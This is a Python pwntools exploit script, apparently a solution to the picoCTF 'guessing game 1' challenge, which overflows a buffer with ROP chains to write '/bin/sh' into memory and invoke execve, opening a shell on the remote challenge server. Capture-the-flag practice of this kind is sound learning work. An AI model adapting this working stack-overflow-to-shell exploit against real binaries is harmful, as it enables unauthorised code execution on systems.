59 lines
1.5 KiB
Python
Executable File
59 lines
1.5 KiB
Python
Executable File
#!/usr/bin/env python
|
|
from pwn import *
|
|
# https://cyb3rwhitesnake.medium.com/picoctf-guessing-game-1-pwn-bdc1c87016f9
|
|
context.terminal = "kitty"
|
|
|
|
numbers = [84, 87, 78, 16, 94, 36] # -> brute-forcing script
|
|
|
|
elf = ELF("./vuln")
|
|
rop = ROP(elf)
|
|
pop_rdi = rop.rdi.address
|
|
pop_rsi = rop.rsi.address
|
|
pop_rdx = rop.rdx.address
|
|
pop_rax = rop.rax.address
|
|
syscall = rop.syscall.address
|
|
bss = elf.bss()
|
|
read = elf.functions['read'].address
|
|
main = elf.functions['main'].address
|
|
|
|
ret_offset = 120
|
|
|
|
conn = remote("shape-facility.picoctf.net", 50780)
|
|
#conn = process("./vuln")
|
|
#attach(conn)
|
|
|
|
conn.recvuntil(b"guess?")
|
|
conn.sendline(str(numbers[0]).encode())
|
|
conn.recvuntil(b"Name?")
|
|
|
|
# call read: read(int fd -> rdi, void buf[count] -> rsi, size_t count -> rdx)
|
|
# read(stdin/0, bss, 12)
|
|
log.info(f"sending read payload")
|
|
payload = cyclic(ret_offset, n=8)
|
|
payload += p64(pop_rdi) + p64(0)
|
|
payload += p64(pop_rsi) + p64(bss)
|
|
payload += p64(pop_rdx) + p64(12)
|
|
payload += p64(read)
|
|
payload += p64(main)
|
|
conn.sendline(payload)
|
|
conn.sendline(b"/bin/sh\x00")
|
|
|
|
conn.recvuntil(b"guess?")
|
|
conn.sendline(str(numbers[1]).encode())
|
|
conn.recvuntil(b"Name?")
|
|
|
|
# call /bin/sh: sys_execve(59), rdi: char *filename, rsi: char *argv, rdx: char *envp
|
|
# sys_execve(bss, NULL/0, NULL/0)
|
|
log.info(f"calling execve")
|
|
payload = cyclic(ret_offset, n=8)
|
|
payload += p64(pop_rax) + p64(59)
|
|
payload += p64(pop_rdi) + p64(bss)
|
|
payload += p64(pop_rsi) + p64(0)
|
|
payload += p64(pop_rdx) + p64(0)
|
|
payload += p64(syscall)
|
|
conn.sendline(payload)
|
|
|
|
conn.recvline()
|
|
conn.interactive()
|
|
|